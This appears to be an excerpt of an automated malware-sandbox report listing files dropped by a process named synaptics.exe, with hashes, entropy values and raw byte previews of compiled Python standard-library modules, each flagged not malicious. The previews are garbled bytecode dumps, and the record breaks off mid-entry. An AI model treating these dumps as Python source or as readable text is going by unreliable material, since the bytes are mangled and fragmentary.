                                                                                                                                                                                                                Preview:o........{-dd........................@...s4...d.Z.g.d...Z.g.d...Z.g.d...Z.e.e...j.Z.e.e...j.Z.d.S.).a....Keywords (from "Grammar/python.gram")..This file is automatically generated; please don't muck it up!..To update the symbols in this file, 'cd' to the top directory of.the python source tree and run:.. PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen Grammar/python.gram Grammar/Tokens Lib/keyword.py..Alternatively, you can run 'make regen-keyword'..)...iskeyword..issoftkeyword..kwlist..softkwlist)#..False..None..TrueZ.andZ.asZ.assertZ.asyncZ.awaitZ.breakZ.classZ.continueZ.defZ.delZ.elifZ.elseZ.exceptZ.finallyZ.forZ.fromZ.globalZ.ifZ.import..inZ.is..lambdaZ.nonlocalZ.notZ.orZ.passZ.raise..returnZ.tryZ.whileZ.withZ.yield)..._Z.case..matchN)...__doc__..__all__r....r......frozenset..__contains__r....r......r....r.....(C:\Users\user\Desktop\tmp\lib\keyword.py..<module>....s...........&....
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4152
                                                                                                                                                                                                                Entropy (8bit):5.314234570644431
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:IZ1X2ppmx0pYUG0wzU182wl91Tc7mh5JFxy8:k4yN10wz5lTTc7mh51
                                                                                                                                                                                                                MD5:C7230AD354F021EC0231950E3DBB3017
                                                                                                                                                                                                                SHA1:947A78AF06238AB3503788736CA890CDE0DA19E6
                                                                                                                                                                                                                SHA-256:E7CFC15A17AFE4B69FDF8C1ED2BEF91D8C3439A97E27754575652424708364BA
                                                                                                                                                                                                                SHA-512:048E0698CA7D416186C873C7EC65366469574FCC3AA49335633069CB55FEB7D0BD59293D4AED0D97866C42752FF022E612072E570EDB329D50674BF39D0994B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.i.Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Cache lines from Python source files...This is intended to read lines from modules imported -- hence if a filename.is not found, it will look down the module search path for a file by.that name.......N)...getline..clearcache..checkcache..lazycachec....................C...s....t.......d.S.).z.Clear the cache entirely.N)...cache..clear..r....r.....*C:\Users\user\Desktop\tmp\lib\linecache.pyr........s......r....c....................C...s8...t.|.|...}.d.|.....k.r.t.|...k.r.n...d.S.|.|.d.....S.d.S.).z~Get a line for a Python source file from the cache.. Update the cache if it doesn't contain an entry for this file already........)...getlines..len)...filename..lineno..module_globals..linesr....r....r....r........s..............r....c....................C...sR...|.t.v.r.t.|...}.t.|...d.k.r.t.|...d...S.z.t.|.|...W.S...t.y(......t.....g
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):46175
                                                                                                                                                                                                                Entropy (8bit):6.061994305403148
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:U5YArctJ0pztzQUB04zzRYKJFSd6tm2Ya4L+P9cLjYp:c1YJGzbB04zVYAFU6BYa4aPuL8p
                                                                                                                                                                                                                MD5:040F19DFE0AC62CC9A8382B2D5F22993
                                                                                                                                                                                                                SHA1:388BC4030220A150B0B83E360CEDAB40CCA0D203
                                                                                                                                                                                                                SHA-256:94B67F8E6C1803A7537C6DB1947C3DFD32869B8828E646F8252FACFA62512D98
                                                                                                                                                                                                                SHA-512:A66F8839656D9D92515BA7958F11480401CD8591C387A9BA0F00E69EA0B03EDD33C9D11BA9E021F5ECB1E6A5631355BC7E0521381A5F1242A197FC31A2BFF684
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.8.......................@...sF"..d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.z.d.d.l.T.W.n%..e.yW......d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.d...Z...d.d.d...Z.Y.n.w.d.e...v.r_e.Z.d.e...v.rfe.Z.e.Z.i.Z.e.. e...d.d.....Z.d.d...Z!..d.d.d...Z"d.d...Z#e..$d...Z%..d.d d!..Z&..d.d"d#..Z'..d.d$d%..Z(..d.d&d'..Z)..d.d)d*..Z*d+d,..Z.d-d...Z+..d.d/d0..Z,e-f.d1d2..Z.d3d4..Z/d5d6..Z0e.Z1d7d8..Z2d9d:..Z3d;d<..Z4d=d>..Z5d?d@..Z6..d.dBdC..Z7e.f.dDdE..Z8..d.dFd...Z.e.f.dGdH..Z9z.d.dIl.m:Z:..W.n...e...y.......dJdK..Z:Y.n.w.z.e;..W.n...e<..y.........d.dLdM..Z=Y.n.w...d.dNdM..Z=i.dOdP..dQdP..dRdS..dTdU..dVdU..dWdX..dYdZ..d[d\..d]d^..d_d`..dadS..dbdc..ddde..dfdg..dhdS..didS..djdS..i.dkdl..dmdn..dodp..dqdr..dsdg..dtdu..dvdc..dwdx..dydz..d{de..d|d}..d~d...d.d...d.d...d.dU..d.d...d.d.....dXd.d.d.d.d.d.d\d^d`d.....Z>e?e>.@....D.].\.ZAZBeA.Cd.d...ZAe>.DeAeB......q.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):12110
                                                                                                                                                                                                                Entropy (8bit):5.374945416164768
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:5+KxmTkRLMC//oLaidHTWAztIvowudjKauXTsmNDGnA:3maCdHbKLXTsmpGnA
                                                                                                                                                                                                                MD5:FFA8001CD8E8395C0F1A2CB498BB6D65
                                                                                                                                                                                                                SHA1:8AE935F3F1A07F75C55379F71773F0E4C6C53A35
                                                                                                                                                                                                                SHA-256:3B37DE6B5C7542D358D6004A43B733A9AFDC25F8E6D5CCC43A5EA3B890C78331
                                                                                                                                                                                                                SHA-512:C67FFD3D28E5F6BA35B441B9E9EE1A24E39C298408E7CC425DED38FB01A13B96A3FF03923156A5D9C376276491C92C31F7ECF14141875D690B33D18A041124F5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dA5.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.Z.d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.S.).aS...Interface to the liblzma compression library...This module provides a class for reading and writing compressed files,.classes for incremental (de)compression, and convenience functions for.one-shot (de)compression...These classes and functions support both the XZ and legacy LZMA.container formats, as well as raw compressed data streams..)$Z.CHECK_NONEZ.CHECK_CRC32Z.CHECK_CRC64Z.CHECK_SHA256Z.CHECK_ID_MAXZ.CHECK_UNKNOWN..FILTER_LZMA1Z.FILTER_LZMA2Z.FILTER_DELTAZ.FILTER_X86Z.FILTER_IA64Z.FILTER_ARMZ.FILTER_ARMTHUMBZ.FILTER_POWERPCZ.FILTER_SPARC..FORMAT_AUTO..FORMAT_XZZ.FORMAT_ALONE..FORMAT_RAWZ.MF_HC3Z.MF_HC4Z.MF_BT2Z.MF_BT3Z.MF_BT4Z.MODE_FASTZ.MODE_NORMALZ.PRESET_DEFAULTZ.PRESET_EXTREME..LZMACompressor..LZMADecompressor..LZMAFile..LZMAError..open..compress..decompressZ.is_c
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17629
                                                                                                                                                                                                                Entropy (8bit):5.673561382830569
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:qZMcSuUoeg6rHVMN9yByEWG6D+nTF+jZjB77Hb930:qWzgWMEWp4+jZjJ930
                                                                                                                                                                                                                MD5:F3373B2AA9C669F6C249E59826DE3C3D
                                                                                                                                                                                                                SHA1:4450418BEB380F465F31288E103CFD173F428800
                                                                                                                                                                                                                SHA-256:753D9CFF2340F83941F9757CDA0F3E45BDFF98FC554B2C346C51B4A2D1FB90D3
                                                                                                                                                                                                                SHA-512:D05D07A807FA1E00040AD17E0B09F33D3A3A572ECD621BCFE98ED201AAB3B2FB407A1E6E4D7799EEA9633A9C4191BE2C6C7AE5715C82C8AD969D86E1B5EA3145
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y%......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.y7......d.Z.Y.n.w.g.d...Z.g.d...Z.d.a.d.a.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.e.....d.d...Z.e.d.k.r|e.....d.S.d.S.).a....Guess the MIME type of a file...This module defines two useful functions:..guess_type(url, strict=True) -- guess the MIME type and encoding of a URL...guess_extension(type, strict=True) -- guess the extension for a given MIME type...It also contains the following, for tuning the behavior:..Data:..knownfiles -- list of files to parse.inited -- flag set when init() has been called.suffix_map -- dictionary mapping suffixes to suffixes.encodings_map -- dictionary mapping suffixes to encodings.types_map -- dictionary mapping suffixes to types..Functions:..init([files]) -- parse a list of files, default knownfiles (on Windows, the. default values are taken from the registry).read_mime_types(
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3943
                                                                                                                                                                                                                Entropy (8bit):5.469523281570689
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:I8lOqPqiKqqHW7Nd5pqKHQwmHv35U4yhWqgv0+USVqtnqqgqhy:I8zPq/qq27NVqKlee4dq8LvVqtnqqgqU
                                                                                                                                                                                                                MD5:4442013AEBF1FDC2E772F68059E24BAC
                                                                                                                                                                                                                SHA1:112B3B7C8A9F9D2236EF94D8D86F43A2D3DB4ED6
                                                                                                                                                                                                                SHA-256:D20641D41130A2CF996012343E0A225E3B1D5F11097C0D07E826EB1C6E17C2D1
                                                                                                                                                                                                                SHA-512:9FB991AB6A6AA9F7CEE891389F994799E33B5C1736C3D62E1895B715390955D3F95287ED5E3FC60A123B12B6B3C4722969ADD4A159AF6BCB979BD4070BEA2AC1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s\...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.g.Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.k.r,e.e.......d.S.d.S.).z-An object-oriented interface to .netrc files......N..netrc..NetrcParseErrorc....................@...s"...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....z5Exception raised on syntax errors in the .netrc file.Nc....................C...s"...|.|._.|.|._.|.|._.t...|.|.....d.S...N)...filename..lineno..msg..Exception..__init__)...selfr....r....r......r.....&C:\Users\user\Desktop\tmp\lib\netrc.pyr........s............z.NetrcParseError.__init__c....................C...s....d.|.j.|.j.|.j.f...S.).Nz.%s (%s, line %s)).r....r....r....).r....r....r....r......__str__....s......z.NetrcParseError.__str__).NN)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............c....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s....|.d.u.}.|.d.u.r.t.j...t.j...d...d...}.i.|._.i.|._.z"t
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):15313
                                                                                                                                                                                                                Entropy (8bit):5.430343498211111
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:z78r8V5t+X9xyFga+mDB8s+qHe65jZBCrF++umt:Era/WkFga+mDGs+hsZwrF++umt
                                                                                                                                                                                                                MD5:5161CEBE0364696EBC651FCC3EC438CF
                                                                                                                                                                                                                SHA1:4AE6261E408F67619A3DC3E40696D1CE304CC340
                                                                                                                                                                                                                SHA-256:CDDDFB179B25CD5FFFD9EB601BA0DBDCE3CE0D6BBA9D34D8AC290119A98A7C2C
                                                                                                                                                                                                                SHA-512:F0B45BADEF595AF7845F2C2E5B4A9E4356B7AC9E458395876B216E56D3E42BD218855FDB5ECFB500738116A024C2740255183B341FCC37BBD91C7199C45ACFE4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dov.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.z.d.d.l.m.Z.m.Z.m.Z...d.d...Z.W.n...e.yK......d.d...Z.Y.n.w.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d d!..Z d"d#..Z!z.d.d$l"m#Z#..W.n...e.y.......d.Z#Y.n.w.d%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(z.d.d/l"m)Z)..W.n...e.y.......e(Z*Y.n.w.d0d1..Z*z.d.d2l"m+Z+m,Z-..W.n...e.y.......e*Z.Y.n.w.d3d4..Z/d5d6..Z0d7d8..d9d:..Z.e1e.d;..o.e..2..d<..d=k.Z3dCd>d?..Z4d@dA..Z5z.d.dBl"m6Z7..W.d.S...e...y.......Y.d.S.w.)Dz.Common pathname manipulations, WindowsNT/95 version...Instead of importing this module directly, import os and refer to this.module as os.path...........\..;../z..;C:\binZ.nul.....N)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirnameZ.commonprefixZ.getsizeZ.getmtimeZ.getatimeZ.getctime..islink..exists..lexists..isdir..isfile..ismount..expanduser..expandvars..normpath..abspath..curdir..pardir..sep..p
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1757
                                                                                                                                                                                                                Entropy (8bit):5.515149918547583
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:Y5kKoXsYZMmrK2Ehp8ItqhhhUIuoLpP0I2GIikGmObMn:Yhov26OqhDaodpkwbMn
                                                                                                                                                                                                                MD5:7F1CCA501371520D1357C1D9A9518104
                                                                                                                                                                                                                SHA1:ED55DF490C7DD3C2D62997E11286DD912E9A5659
                                                                                                                                                                                                                SHA-256:A54B11192A3B7B48E7A1F2764A77287FB4841B79499891810B80464D57E69F4F
                                                                                                                                                                                                                SHA-512:0BB2AB65DDE8E1312997A7B9DB4D77EA00087B177106A0B00732AFA44DD9FC61980A379AEB44E8CC612503698284F3A7AE2AAD38FE2A30CFDA79372AC7D3E1A3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d...Z.d.d...Z.d.S.).z.Convert a NT pathname to a file URL and vice versa...This module only exists to provide OS-specific code.for urllib.requests, thus do not use directly..c....................C...s....d.d.l.}.d.d.l.}.|...d.d...}.d.|.v.r.|.d.d.....d.k.r |.d.d.....}.|...d...}.|.j...d...|.....S.|...d...}.t.|...d.k.sB|.d...d...|.j.v.rJd.|...}.t.|.....|.d...d.......}.|.d.....d...}.|.d...}.|.D.].}.|.rm|.d...|.j...|.....}.q_|...d...r||...d...r||.d.7.}.|.S.).z{OS-specific conversion from a relative URL of the 'file' scheme. to a file system path; not recommended for general use......N..:..|.....z.////......./..\.....z.Bad URL: .....)...string..urllib.parse..replace..split..parse..unquote..join..len..ascii_letters..OSError..upper..endswith)...urlr......urllib..components..comp..error..drive..path..r.....+C:\Users\user\Desktop\tmp\lib\nturl2path.py..url2pathname....s*.............................................r....c....................C
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):13518
                                                                                                                                                                                                                Entropy (8bit):4.843645147232107
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:a25I4L+HDe0C1/u2/DqnsvQgZ2CsiIKoVkDq01iYL5ADAzi8Lq4UZfm:Z5weTs2rwejZ2CoKo4iY9cA+8LAfm
                                                                                                                                                                                                                MD5:110D7249FC4947BB113D6B8049C0361F
                                                                                                                                                                                                                SHA1:F0899AC9E4E96774E0FB232D68A021E6D1D3EF69
                                                                                                                                                                                                                SHA-256:970448F68D6325501C5143DFB91A6D24DDA5C292C6C5E3F29EDE9C5E1EF2B213
                                                                                                                                                                                                                SHA-512:DA12EEBEF3EF196637391A240A1446FE08E8FB1FC3E60D5ED81EE23260809D39A19072AC4C4690C8144ED494B33C9801ACF15566C8F697792ED972347C1D7DB2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.+.......................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.e.Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.d.d/..Z.d0d1..Z.d2d3..Z.d4d5..Z.d6d7..Z.d8d9..Z.d:d;..Z d<d=..Z!d>d?..Z"d@dA..Z#dBdC..Z$dDdE..Z%dFdG..Z&dHdI..Z'dqdJdK..Z(G.dLdM..dM..Z)G.dNdO..dO..Z*G.dPdQ..dQ..Z+dRdS..Z,dTdU..Z-dVdW..Z.dXdY..Z/dZd[..Z0d\d]..Z1d^d_..Z2d`da..Z3dbdc..Z4ddde..Z5dfdg..Z6dhdi..Z7djdk..Z8dldm..Z9z.d.dnl:T.W.n...e;y.......Y.n.w.d.dol:m.Z...e.Z<e.Z=e.Z>e.Z?e.Z@e.ZAe.ZBe.ZCe.ZDe.ZEe.ZFe.ZGe.ZHe.ZIe.ZJe.ZKe.ZLe.ZMe.ZNe.ZOe.ZPe.ZQe.ZRe.ZSe.ZTe ZUe!ZVe"ZWe$ZXe%ZYe'ZZe,Z[e-Z\e.Z]e/Z^e0Z_e1Z`e2Zae3Zbe4Zce5Zde6Zee7Zfe8Zge9ZhdpS.)ras....Operator Interface..This module exports a set of functions corresponding to the intrinsic.operators of Python. For example, operator.add(x, y) is equivalent.to the expression x+y. The function names are those used for special.methods; variants
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):31609
                                                                                                                                                                                                                Entropy (8bit):5.451319821940571
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:6Zz4Z1oaK+W0l85fOHqjQmZxhVQIuA5+LBL3L8LOULOLwvLdLtg4aE2aYiZ9:hbK+WHaKQmZBw2LN2Y
                                                                                                                                                                                                                MD5:52AC8B6D03833D14302EAACFB3C9EC6A
                                                                                                                                                                                                                SHA1:917DB1AF29FF43759C3EFE5258894609DAEE02ED
                                                                                                                                                                                                                SHA-256:C46828DAECB00F4A03FF5F4847DA158A9DB67FDFD59E34E13579ECB67064EB80
                                                                                                                                                                                                                SHA-512:2B2EB16C4035D71E4A28EAC3A074597CA4621D28D169E67E9AAD000CC9D22CDA109D98C0D7F4869F1AB2323FB63FDB5570C673600B102F86E66622A26626B45D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d........................@...sh...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.e.....Z.e.j.Z.g.d...Z.d.d...Z.d.d...Z.d.e.v.rod.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.yK......Y.n.w.d.d.l.Z.z.d.d.l.m.Z...W.n...e.ya......Y.n.w.d.d.l.Z.e...e.e.......[.nId.e.v.r.d.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.d.l.Z.d.d.l.Z.e...e.e.......[.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.d.....e.e.j.d.<.d.d.l.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..[.e.d.....r.e&..Z'd.d...Z(e)..Z*e(d.d.....e(d.d.....e(d.d.....e(d.d.....e(d.d ....e(d!d"....e(d#d$....e(d%d&....e(d'd(....e(d)d*....e(d+d,....e(d-d.....e(d/d0....e(d1d2....e(d1d3....e(d4d ....e*Z+e)..Z*e(d.d.....e*Z,e)..Z*e(d5d6....e(d7d.....e(d8d.....e(d9d:....e(d9d;....e(d<d=....e*.-e.....e(d>d?....e(d@d ....e(dAd ....e(dBdC....e.dD....r.e.dE....r.e(dFdD....e*Z.e)..Z*e(d.d.....e(d.d.....e(d.d.....e(dGdH....e(dId.....e.dJ....r.e(dKd.....e(d!d"....e(dLd ....e(dMd.....e(d.d.....e(d4d ....e(dNd.....e*Z/[*[.['[(d.Z0dOZ1dPZ2d.dSdT..Z3
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):42062
                                                                                                                                                                                                                Entropy (8bit):5.2377775068417565
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:qJHqwOM28a8BgsMwiT3iWOhVECkoB3RDwgU46Jr8Dybx4YChUPbmHMx2+64qvWLo:EKwOM2QLMweUhVECkoB3REz4uPx2hUjY
                                                                                                                                                                                                                MD5:B01FCA7B805AF2A915EF63AA93C896EA
                                                                                                                                                                                                                SHA1:7453166A5B6EA27A355B90A887DD516B14FA96BB
                                                                                                                                                                                                                SHA-256:AA28992D552D75F43D7D53EDF2933084F70574A373D8FADD439764FA15BC335F
                                                                                                                                                                                                                SHA-512:9894DEE0BEA1A7EF185BA847C2F6CF718C6D77DA9B0704482A1CC38336A813C91DBD34DC45AB517F8716D47397A655D1C87D9877294F1CEDABFB10408D6A6619
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d\........................@...s4...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.Z.d.Z d.Z!e.e.e.e.f.Z"e.e e!f.Z#d.d...Z$d.d...Z%G.d.d...d.e&..Z'G.d.d...d.e'..Z(G.d.d...d.e'..Z)e(..Z*e)..Z+G.d.d...d...Z,G.d.d...d.e,..Z-e-..Z.d.d...Z/e0e.d...r.e..1..e/..Z/G.d.d...d...Z2G.d.d...d...Z3G.d d!..d!e2..Z4G.d"d#..d#e2..Z5G.d$d%..d%e2..Z6G.d&d'..d'e...Z7G.d(d)..d)e&..Z8e.j9.:e8....G.d*d+..d+e8..Z;G.d,d-..d-e8..Z<G.d.d/..d/e8..Z=G.d0d1..d1e=e;..Z>G.d2d3..d3e=e<..Z?d.S.)4.....N)...Sequence)...EINVAL..ENOENT..ENOTDIR..EBADF..ELOOP)...attrgetter)...S_ISDIR..S_ISLNK..S_ISREG..S_ISSOCK..S_ISBLK..S_ISCHR..S_ISFIFO)...quote_from_bytes)...PurePath..PurePosixPath..PureWindowsPath..Path..PosixPath..WindowsPath......{...i....c....................C...s ...t.|.d.d...t.v.p.t.|.d.d...t.v.S.).N..errno..winerror)...getattr.._IGNORED_ERROS.._IGNORED_WINERRORS)...except
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10540
                                                                                                                                                                                                                Entropy (8bit):5.325288035457031
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:/hb0oiDyslc6Yc5JJ0kMzr1z37oItrg2spGuDbTM0tNWCEZC:/hGDLlTYc5JJ5Itr5spLbo0bdEZC
                                                                                                                                                                                                                MD5:8FCE05D14601D47E7882E7B9450193F1
                                                                                                                                                                                                                SHA1:A7CEA5F8DA812F14206E75C61E9DB267F386D89C
                                                                                                                                                                                                                SHA-256:14A455EDCDCFCB701ED62C8D8468E5363A501DBBBCBDAACD60F84F8F18EED825
                                                                                                                                                                                                                SHA-512:22BE7F59EC53DE29127EE83DB2218A09549B4825CB71FFAD2C1E91191CE83F72C091E41C4F73605410DDA6B9F262FA8919DC089D15BBE74DFB6FE291D404771C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.A.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.a.d.a.d%d&..Z.d'd(..Z.d)d*..Z d+d,..d-d...Z!d/d0..Z"e.j#d1k.Z$d6d2d3..Z%d4d5..Z&d.S.)7a....Common operations on Posix pathnames...Instead of importing this module directly, import os and refer to.this module as os.path. The "os.path" name is an alias for this.module on Posix systems; on other systems (e.g. Windows),.os.path provides the same operations in a manner specific to that.platform, and is an alias to another module (e.g. ntpath)...Some of this can actually be useful on non-Posix systems too, e.g..for manipulation of the pathname component of URLs.........../..:z./bin:/usr/binNz./dev/null.....)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirname..commonprefix..getsize..getmtime..getatime..getctime..islink..exis
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10802
                                                                                                                                                                                                                Entropy (8bit):5.077625791934223
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:3u+pM4/fRWdufeC/PBbEy6LWf1eR/i9Z6/cWyfmrAX/I8:++pMQQdufd/PBbEy6LWdeo9s/PyfmrCP
                                                                                                                                                                                                                MD5:E749ACC7227D5006C3637910FA652873
                                                                                                                                                                                                                SHA1:F198A7A7116120DD768E3C35E778CDE3ACE315BE
                                                                                                                                                                                                                SHA-256:07D3BEF7EA4EAAC8F291192353131290DEFE19AAA0191956ACB139B1B02CF306
                                                                                                                                                                                                                SHA-512:F1E98B33A89AD42E13BEB26258C168321C757DA57797189B86B8BDB7CF67482B990008485C66C432B935232F7B0B039F3FD049BC06E07B5069BCFFDC146B613B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y1......d.Z.Y.n.w.g.d...Z.z.d.d.l.m.Z...W.n...e.yO......G.d.d...d.e...Z.Y.n.w.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.u.r~e.Z.d.S.d.S.).z'A multi-producer, multi-consumer queue......N)...deque)...heappush..heappop)...monotonic)...SimpleQueue)...Empty..Full..Queue..PriorityQueue..LifoQueuer....).r....c....................@........e.Z.d.Z.d.Z.d.S.).r....z4Exception raised by Queue.get(block=0)/get_nowait().N....__name__..__module__..__qualname__..__doc__..r....r.....&C:\Users\user\Desktop\tmp\lib\queue.pyr...................r....c....................@...r....).r....z4Exception raised by Queue.put(block=0)/put_nowait().Nr....r....r....r....r....r........r....r....c....................@...s....e.Z.d.Z.d.Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d"d.d...Z.d"d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.e.e
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5804
                                                                                                                                                                                                                Entropy (8bit):5.448878972565236
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:u/Pp0xXxswv10Ex2XWFP0nf5nizGJFNYTBTO7u10IbJJs5WkbtL4FRJpGyd/8tzs:kqrswv2RGmxMGb+rIWkOFldkS
                                                                                                                                                                                                                MD5:60320469B2AD043197FD2AE019C271A9
